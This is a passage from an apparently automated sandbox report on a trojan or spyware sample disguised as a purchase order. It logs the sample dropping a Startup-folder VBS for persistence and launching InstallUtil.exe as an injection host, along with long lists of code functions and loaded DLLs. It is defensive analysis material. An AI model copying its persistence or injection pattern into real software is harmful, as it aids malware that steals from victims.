                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD3E475_2_06CD3E47
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06D774B05_2_06D774B0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06D700405_2_06D70040
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06D774A35_2_06D774A3
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06D7003B5_2_06D7003B
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06D779CB5_2_06D779CB
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06D761A35_2_06D761A3
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06D761A85_2_06D761A8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06E93CEC5_2_06E93CEC
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06E940AC5_2_06E940AC
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06E93C605_2_06E93C60
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06E93C705_2_06E93C70
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06E9414D5_2_06E9414D
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06E93D2B5_2_06E93D2B
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06E93D2E5_2_06E93D2E
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06EA97F05_2_06EA97F0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06EA3FED5_2_06EA3FED
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06EA97DF5_2_06EA97DF
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06EABCA85_2_06EABCA8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06EABCB85_2_06EABCB8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06EAE4975_2_06EAE497
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06EABC585_2_06EABC58
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06EA9C255_2_06EA9C25
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_0717E2B05_2_0717E2B0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_0717DF005_2_0717DF00
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_0716003F5_2_0716003F
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_071600405_2_07160040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB1A406_2_02BB1A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB23F86_2_02BB23F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB24A76_2_02BB24A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB248E6_2_02BB248E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB24E66_2_02BB24E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB24CF6_2_02BB24CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB243C6_2_02BB243C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB24786_2_02BB2478
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB24626_2_02BB2462
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB455F6_2_02BB455F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB1A306_2_02BB1A30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB1A406_2_02BB1A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB4B406_2_02BB4B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB1E306_2_02BB1E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02BB1E206_2_02BB1E20
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002C3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.000000000476A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000000.2008380460.0000000000802000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePO56.exe* vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002E66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOrkexnhsfu.exe" vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2157610900.00000000045F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2147980607.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2170019027.00000000067E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2163407938.0000000006430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFozxv.dll" vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exeBinary or memory string: OriginalFilenamePO56.exe* vs PO-12202432_ACD_Group.pif.exe
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/4@2/2
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\fc2a428e6332
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs"
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: PO-12202432_ACD_Group.pif.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: PO-12202432_ACD_Group.pif.exeReversingLabs: Detection: 68%
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile read: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe "C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe"
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe"
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
